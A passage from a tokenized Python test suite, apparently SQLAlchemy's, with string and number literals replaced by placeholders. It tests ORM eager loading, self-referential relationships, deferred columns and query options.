. users , properties = { <EOL> '<STR_LIT>' : relationship ( Address ) , <EOL> } ) <EOL> mapper ( Address , self . tables . addresses , properties = { <EOL> '<STR_LIT>' : relationship ( Dingaling ) <EOL> } ) <EOL> mapper ( Dingaling , self . tables . dingalings ) <EOL> sess = Session ( autoflush = False ) <EOL> return User , Address , Dingaling , sess <EOL> def _collection_to_collection_fixture ( self ) : <EOL> User , Order , Item = self . classes . User , self . classes . Order , self . classes . Item <EOL> mapper ( User , self . tables . users , properties = { <EOL> '<STR_LIT>' : relationship ( Order ) , <EOL> } ) <EOL> mapper ( Order , self . tables . orders , properties = { <EOL> '<STR_LIT>' : relationship ( Item , secondary = self . tables . order_items ) , <EOL> } ) <EOL> mapper ( Item , self . tables . items ) <EOL> sess = Session ( autoflush = False ) <EOL> return User , Order , Item , sess <EOL> def _eager_config_fixture ( self ) : <EOL> User , Address = self . classes . User , self . classes . Address <EOL> mapper ( User , self . tables . users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = "<STR_LIT>" ) , <EOL> } ) <EOL> mapper ( Address , self . tables . addresses ) <EOL> sess = Session ( autoflush = False ) <EOL> return User , Address , sess <EOL> def test_no_query_on_refresh ( self ) : <EOL> User , Address , sess = self . _eager_config_fixture ( ) <EOL> u1 = sess . query ( User ) . get ( <NUM_LIT:8> ) <EOL> assert '<STR_LIT>' in u1 . __dict__ <EOL> sess . expire ( u1 ) <EOL> def go ( ) : <EOL> eq_ ( u1 . id , <NUM_LIT:8> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> assert '<STR_LIT>' not in u1 . __dict__ <EOL> def test_loads_second_level_collection_to_scalar ( self ) : <EOL> User , Address , Dingaling , sess = self . _collection_to_scalar_fixture ( ) <EOL> u1 = sess . query ( User ) . get ( <NUM_LIT:8> ) <EOL> a1 = Address ( ) <EOL> u1 . addresses . append ( a1 ) <EOL> a2 = u1 . addresses [ <NUM_LIT:0> ] <EOL> a2 . email_address = '<STR_LIT:foo>' <EOL> sess . query ( User ) . options ( joinedload_all ( "<STR_LIT>" ) ) . filter_by ( id = <NUM_LIT:8> ) . all ( ) <EOL> assert u1 . addresses [ - <NUM_LIT:1> ] is a1 <EOL> for a in u1 . addresses : <EOL> if a is not a1 : <EOL> assert '<STR_LIT>' in a . __dict__ <EOL> else : <EOL> assert '<STR_LIT>' not in a . __dict__ <EOL> if a is a2 : <EOL> eq_ ( a2 . email_address , '<STR_LIT:foo>' ) <EOL> def test_loads_second_level_collection_to_collection ( self ) : <EOL> User , Order , Item , sess = self . _collection_to_collection_fixture ( ) <EOL> u1 = sess . query ( User ) . get ( <NUM_LIT:7> ) <EOL> u1 . orders <EOL> o1 = Order ( ) <EOL> u1 . orders . append ( o1 ) <EOL> sess . query ( User ) . options ( joinedload_all ( "<STR_LIT>" ) ) . filter_by ( id = <NUM_LIT:7> ) . all ( ) <EOL> for o in u1 . orders : <EOL> if o is not o1 : <EOL> assert '<STR_LIT>' in o . __dict__ <EOL> else : <EOL> assert '<STR_LIT>' not in o . __dict__ <EOL> def test_load_two_levels_collection_to_scalar ( self ) : <EOL> User , Address , Dingaling , sess = self . _collection_to_scalar_fixture ( ) <EOL> u1 = sess . query ( User ) . filter_by ( <EOL> id = <NUM_LIT:8> ) . options ( <EOL> joinedload ( "<STR_LIT>" ) ) . one ( ) <EOL> sess . query ( User ) . filter_by ( <EOL> id = <NUM_LIT:8> ) . options ( <EOL> joinedload_all ( "<STR_LIT>" ) ) . first ( ) <EOL> assert '<STR_LIT>' in u1 . addresses [ <NUM_LIT:0> ] . __dict__ <EOL> def test_load_two_levels_collection_to_collection ( self ) : <EOL> User , Order , Item , sess = self . _collection_to_collection_fixture ( ) <EOL> u1 = sess . query ( User ) . filter_by ( <EOL> id = <NUM_LIT:7> ) . options ( <EOL> joinedload ( "<STR_LIT>" ) ) . one ( ) <EOL> sess . query ( User ) . filter_by ( <EOL> id = <NUM_LIT:7> ) . options ( <EOL> joinedload_all ( "<STR_LIT>" ) ) . first ( ) <EOL> assert '<STR_LIT>' in u1 . orders [ <NUM_LIT:0> ] . __dict__ <EOL> class AddEntityTest ( _fixtures . FixtureTest ) : <EOL> run_inserts = '<STR_LIT>' <EOL> run_deletes = None <EOL> def _assert_result ( self ) : <EOL> Item , Address , Order , User = ( self . classes . Item , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . classes . User ) <EOL> return [ <EOL> ( <EOL> User ( id = <NUM_LIT:7> , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] <EOL> ) , <EOL> Order ( id = <NUM_LIT:1> , <EOL> items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] <EOL> ) , <EOL> ) , <EOL> ( <EOL> User ( id = <NUM_LIT:7> , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] <EOL> ) , <EOL> Order ( id = <NUM_LIT:3> , <EOL> items = [ Item ( id = <NUM_LIT:3> ) , Item ( id = <NUM_LIT:4> ) , Item ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> ) , <EOL> ( <EOL> User ( id = <NUM_LIT:7> , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] <EOL> ) , <EOL> Order ( id = <NUM_LIT:5> , <EOL> items = [ Item ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> ) , <EOL> ( <EOL> User ( id = <NUM_LIT:9> , <EOL> addresses = [ Address ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> Order ( id = <NUM_LIT:2> , <EOL> items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] <EOL> ) , <EOL> ) , <EOL> ( <EOL> User ( id = <NUM_LIT:9> , <EOL> addresses = [ Address ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> Order ( id = <NUM_LIT:4> , <EOL> items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> ) <EOL> ] <EOL> def test_mapper_configured ( self ) : <EOL> users , items , order_items , Order , Item , User , Address , orders , addresses = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . tables . orders , <EOL> self . tables . addresses ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : relationship ( Order ) <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Item , secondary = order_items , lazy = '<STR_LIT>' , <EOL> order_by = items . c . id ) <EOL> } ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> oalias = sa . orm . aliased ( Order ) <EOL> def go ( ) : <EOL> ret = sess . query ( User , oalias ) . join ( oalias , '<STR_LIT>' ) . order_by ( User . id , oalias . id ) . all ( ) <EOL> eq_ ( ret , self . _assert_result ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_options ( self ) : <EOL> users , items , order_items , Order , Item , User , Address , orders , addresses = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . tables . orders , <EOL> self . tables . addresses ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address ) , <EOL> '<STR_LIT>' : relationship ( Order ) <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Item , secondary = order_items , order_by = items . c . id ) <EOL> } ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> oalias = sa . orm . aliased ( Order ) <EOL> def go ( ) : <EOL> ret = sess . query ( User , oalias ) . options ( joinedload ( '<STR_LIT>' ) ) . join ( oalias , '<STR_LIT>' ) . order_by ( User . id , oalias . id ) . all ( ) <EOL> eq_ ( ret , self . _assert_result ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:6> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> ret = sess . query ( User , oalias ) . options ( joinedload ( '<STR_LIT>' ) , <EOL> joinedload ( oalias . items ) ) . join ( oalias , '<STR_LIT>' ) . order_by ( User . id , oalias . id ) . all ( ) <EOL> eq_ ( ret , self . _assert_result ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> class OrderBySecondaryTest ( fixtures . MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> Table ( '<STR_LIT:a>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:data>' , String ( <NUM_LIT:50> ) ) ) <EOL> Table ( '<STR_LIT:b>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:data>' , String ( <NUM_LIT:50> ) ) ) <EOL> @ classmethod <EOL> def fixtures ( cls ) : <EOL> return dict ( <EOL> a = ( ( '<STR_LIT:id>' , '<STR_LIT:data>' ) , <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) ) , <EOL> b = ( ( '<STR_LIT:id>' , '<STR_LIT:data>' ) , <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:3> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:4> , '<STR_LIT>' ) ) , <EOL> m2m = ( ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:2> ) , <EOL> ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> ) , <EOL> ( <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:3> ) ) ) <EOL> def test_ordering ( self ) : <EOL> a , m2m , b = ( <EOL> self . tables . a , <EOL> self . tables . m2m , <EOL> self . tables . b ) <EOL> class A ( fixtures . ComparableEntity ) : <EOL> pass <EOL> class B ( fixtures . ComparableEntity ) : <EOL> pass <EOL> mapper ( A , a , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> B , secondary = m2m , lazy = '<STR_LIT>' , order_by = m2m . c . id ) <EOL> } ) <EOL> mapper ( B , b ) <EOL> sess = create_session ( ) <EOL> eq_ ( sess . query ( A ) . all ( ) , <EOL> [ <EOL> A ( data = '<STR_LIT>' , bs = [ B ( data = '<STR_LIT>' ) , B ( data = '<STR_LIT>' ) , B ( data = '<STR_LIT>' ) ] ) , <EOL> A ( bs = [ B ( data = '<STR_LIT>' ) , B ( data = '<STR_LIT>' ) , B ( data = '<STR_LIT>' ) ] ) <EOL> ] ) <EOL> class SelfReferentialEagerTest ( fixtures . MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:data>' , String ( <NUM_LIT:30> ) ) ) <EOL> def test_basic ( self ) : <EOL> nodes = self . tables . nodes <EOL> class Node ( fixtures . ComparableEntity ) : <EOL> def append ( self , node ) : <EOL> self . children . append ( node ) <EOL> mapper ( Node , nodes , properties = { <EOL> '<STR_LIT>' : relationship ( Node , <EOL> lazy = '<STR_LIT>' , <EOL> join_depth = <NUM_LIT:3> , order_by = nodes . c . id ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> n1 = Node ( data = '<STR_LIT>' ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> sess . add ( n1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> d = sess . query ( Node ) . filter_by ( data = '<STR_LIT>' ) . all ( ) [ <NUM_LIT:0> ] <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , d ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> d = sess . query ( Node ) . filter_by ( data = '<STR_LIT>' ) . first ( ) <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , d ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_lazy_fallback_doesnt_affect_eager ( self ) : <EOL> nodes = self . tables . nodes <EOL> class Node ( fixtures . ComparableEntity ) : <EOL> def append ( self , node ) : <EOL> self . children . append ( node ) <EOL> mapper ( Node , nodes , properties = { <EOL> '<STR_LIT>' : relationship ( Node , lazy = '<STR_LIT>' , join_depth = <NUM_LIT:1> , <EOL> order_by = nodes . c . id ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> n1 = Node ( data = '<STR_LIT>' ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> sess . add ( n1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> allnodes = sess . query ( Node ) . order_by ( Node . data ) . all ( ) <EOL> n12 = allnodes [ <NUM_LIT:2> ] <EOL> eq_ ( n12 . data , '<STR_LIT>' ) <EOL> eq_ ( [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] , list ( n12 . children ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_with_deferred ( self ) : <EOL> nodes = self . tables . nodes <EOL> class Node ( fixtures . ComparableEntity ) : <EOL> def append ( self , node ) : <EOL> self . children . append ( node ) <EOL> mapper ( Node , nodes , properties = { <EOL> '<STR_LIT>' : relationship ( Node , lazy = '<STR_LIT>' , join_depth = <NUM_LIT:3> , <EOL> order_by = nodes . c . id ) , <EOL> '<STR_LIT:data>' : deferred ( nodes . c . data ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> n1 = Node ( data = '<STR_LIT>' ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> sess . add ( n1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> Node ( data = '<STR_LIT>' , children = [ Node ( data = '<STR_LIT>' ) , Node ( data = '<STR_LIT>' ) ] ) , <EOL> sess . query ( Node ) . order_by ( Node . id ) . first ( ) , <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:4> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ Node ( data = '<STR_LIT>' ) , Node ( data = '<STR_LIT>' ) ] ) , <EOL> sess . query ( Node ) . <EOL> options ( undefer ( '<STR_LIT:data>' ) ) . order_by ( Node . id ) . first ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:3> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ Node ( data = '<STR_LIT>' ) , Node ( data = '<STR_LIT>' ) ] ) , <EOL> sess . query ( Node ) . options ( undefer ( '<STR_LIT:data>' ) , <EOL> undefer ( '<STR_LIT>' ) ) . first ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_options ( self ) : <EOL> nodes = self . tables . nodes <EOL> class Node ( fixtures . ComparableEntity ) : <EOL> def append ( self , node ) : <EOL> self . children . append ( node ) <EOL> mapper ( Node , nodes , properties = { <EOL> '<STR_LIT>' : relationship ( Node , lazy = '<STR_LIT>' , order_by = nodes . c . id ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> n1 = Node ( data = '<STR_LIT>' ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> sess . add ( n1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> d = sess . query ( Node ) . filter_by ( data = '<STR_LIT>' ) . order_by ( Node . id ) . options ( joinedload ( '<STR_LIT>' ) ) . first ( ) <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , d ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:2> ) <EOL> def go ( ) : <EOL> sess . query ( Node ) . order_by ( Node . id ) . filter_by ( data = '<STR_LIT>' ) . options ( joinedload ( '<STR_LIT>' ) ) . first ( ) <EOL> self . assert_sql_execution ( <EOL> testing . db , go , <EOL> CompiledSQL ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> ) <EOL> def test_no_depth ( self ) : <EOL> nodes = self . tables . nodes <EOL> class Node ( fixtures . ComparableEntity ) : <EOL> def append ( self , node ) : <EOL> self . children . append ( node ) <EOL> mapper ( Node , nodes , properties = { <EOL> '<STR_LIT>' : relationship ( Node , lazy = '<STR_LIT>' ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> n1 = Node ( data = '<STR_LIT>' ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> n1 . children [ <NUM_LIT:1> ] . append ( Node ( data = '<STR_LIT>' ) ) <EOL> sess . add ( n1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> d = sess . query ( Node ) . filter_by ( data = '<STR_LIT>' ) . first ( ) <EOL> eq_ ( Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' , children = [ <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , <EOL> Node ( data = '<STR_LIT>' ) <EOL> ] ) , d ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:3> ) <EOL> class MixedSelfReferentialEagerTest ( fixtures . MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> @ classmethod <EOL> def setup_mappers ( cls ) : <EOL> b_table , a_table = cls . tables . b_table , cls . tables . a_table <EOL> class A ( cls . Comparable ) : <EOL> pass <EOL> class B ( cls . Comparable ) : <EOL> pass <EOL> mapper ( A , a_table ) <EOL> mapper ( B , b_table , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> B , <EOL> remote_side = [ b_table . c . id ] , <EOL> primaryjoin = ( b_table . c . parent_b1_id == b_table . c . id ) , <EOL> order_by = b_table . c . id <EOL> ) , <EOL> '<STR_LIT>' : relationship ( A , lazy = True ) , <EOL> '<STR_LIT>' : relationship ( <EOL> B , <EOL> remote_side = [ b_table . c . id ] , <EOL> primaryjoin = ( b_table . c . parent_b2_id == b_table . c . id ) , <EOL> order_by = b_table . c . id <EOL> ) <EOL> } ) <EOL> @ classmethod <EOL> def insert_data ( cls ) : <EOL> b_table , a_table = cls . tables . b_table , cls . tables . a_table <EOL> a_table . insert ( ) . execute ( dict ( id = <NUM_LIT:1> ) , dict ( id = <NUM_LIT:2> ) , dict ( id = <NUM_LIT:3> ) ) <EOL> b_table . insert ( ) . execute ( <EOL> dict ( id = <NUM_LIT:1> , parent_a_id = <NUM_LIT:2> , parent_b1_id = None , parent_b2_id = None ) , <EOL> dict ( id = <NUM_LIT:2> , parent_a_id = <NUM_LIT:1> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = None ) , <EOL> dict ( id = <NUM_LIT:3> , parent_a_id = <NUM_LIT:1> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = <NUM_LIT:2> ) , <EOL> dict ( id = <NUM_LIT:4> , parent_a_id = <NUM_LIT:3> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = None ) , <EOL> dict ( id = <NUM_LIT:5> , parent_a_id = <NUM_LIT:3> , parent_b1_id = None , parent_b2_id = <NUM_LIT:2> ) , <EOL> dict ( id = <NUM_LIT:6> , parent_a_id = <NUM_LIT:1> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = <NUM_LIT:3> ) , <EOL> dict ( id = <NUM_LIT:7> , parent_a_id = <NUM_LIT:2> , parent_b1_id = None , parent_b2_id = <NUM_LIT:3> ) , <EOL> dict ( id = <NUM_LIT:8> , parent_a_id = <NUM_LIT:2> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = <NUM_LIT:2> ) , <EOL> dict ( id = <NUM_LIT:9> , parent_a_id = None , parent_b1_id = <NUM_LIT:1> , parent_b2_id = None ) , <EOL> dict ( id = <NUM_LIT:10> , parent_a_id = <NUM_LIT:3> , parent_b1_id = <NUM_LIT:7> , parent_b2_id = <NUM_LIT:2> ) , <EOL> dict ( id = <NUM_LIT:11> , parent_a_id = <NUM_LIT:3> , parent_b1_id = <NUM_LIT:1> , parent_b2_id = <NUM_LIT:8> ) , <EOL> dict ( id = <NUM_LIT:12> , parent_a_id = <NUM_LIT:2> , parent_b1_id = <NUM_LIT:5> , parent_b2_id = <NUM_LIT:2> ) , <EOL> dict ( id = <NUM_LIT> , parent_a_id = <NUM_LIT:3> , parent_b1_id = <NUM_LIT:4> , parent_b2_id = <NUM_LIT:4> ) , <EOL> dict ( id = <NUM_LIT> , parent_a_id = <NUM_LIT:3> , parent_b1_id = <NUM_LIT:7> , parent_b2_id = <NUM_LIT:2> ) , <EOL> ) <EOL> def test_eager_load ( self ) : <EOL> A , B = self . classes . A , self . classes . B <EOL> session = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> session . query ( B ) . <EOL> options ( <EOL> joinedload ( '<STR_LIT>' ) , <EOL> joinedload ( '<STR_LIT>' ) , <EOL> joinedload ( '<STR_LIT>' ) <EOL> ) . <EOL> filter ( B . id . in_ ( [ <NUM_LIT:2> , <NUM_LIT:8> , <NUM_LIT:11> ] ) ) . order_by ( B . id ) . all ( ) , <EOL> [ <EOL> B ( id = <NUM_LIT:2> , <EOL> parent_z = A ( id = <NUM_LIT:1> ) , <EOL> parent_b1 = B ( id = <NUM_LIT:1> ) , <EOL> parent_b2 = None ) , <EOL> B ( id = <NUM_LIT:8> , <EOL> parent_z = A ( id = <NUM_LIT:2> ) , <EOL> parent_b1 = B ( id = <NUM_LIT:1> ) , <EOL> parent_b2 = B ( id = <NUM_LIT:2> ) ) , <EOL> B ( id = <NUM_LIT:11> , <EOL> parent_z = A ( id = <NUM_LIT:3> ) , <EOL> parent_b1 = B ( id = <NUM_LIT:1> ) , <EOL> parent_b2 = B ( id = <NUM_LIT:8> ) ) <EOL> ] <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> class SelfReferentialM2MEagerTest ( fixtures . MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:name>' , sa . String ( <NUM_LIT> ) , nullable = False , unique = True ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> sa . UniqueConstraint ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> def test_basic ( self ) : <EOL> widget , widget_rel = self . tables . widget , self . tables . widget_rel <EOL> class Widget ( fixtures . ComparableEntity ) : <EOL> pass <EOL> mapper ( Widget , widget , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Widget , secondary = widget_rel , <EOL> primaryjoin = widget_rel . c . parent_id == widget . c . id , <EOL> secondaryjoin = widget_rel . c . child_id == widget . c . id , <EOL> lazy = '<STR_LIT>' , join_depth = <NUM_LIT:1> , <EOL> ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> w1 = Widget ( name = '<STR_LIT>' ) <EOL> w2 = Widget ( name = '<STR_LIT>' ) <EOL> w1 . children . append ( w2 ) <EOL> sess . add ( w1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( [ Widget ( name = '<STR_LIT>' , children = [ Widget ( name = '<STR_LIT>' ) ] ) ] , <EOL> sess . query ( Widget ) . filter ( Widget . name == '<STR_LIT>' ) . all ( ) ) <EOL> class MixedEntitiesTest ( _fixtures . FixtureTest , testing . AssertsCompiledSQL ) : <EOL> run_setup_mappers = '<STR_LIT>' <EOL> run_inserts = '<STR_LIT>' <EOL> run_deletes = None <EOL> __dialect__ = '<STR_LIT:default>' <EOL> __prefer_backends__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ classmethod <EOL> def setup_mappers ( cls ) : <EOL> users , Keyword , items , order_items , orders , Item , User , Address , keywords , Order , item_keywords , addresses = ( <EOL> cls . tables . users , <EOL> cls . classes . Keyword , <EOL> cls . tables . items , <EOL> cls . tables . order_items , <EOL> cls . tables . orders , <EOL> cls . classes . Item , <EOL> cls . classes . User , <EOL> cls . classes . Address , <EOL> cls . tables . keywords , <EOL> cls . classes . Order , <EOL> cls . tables . item_keywords , <EOL> cls 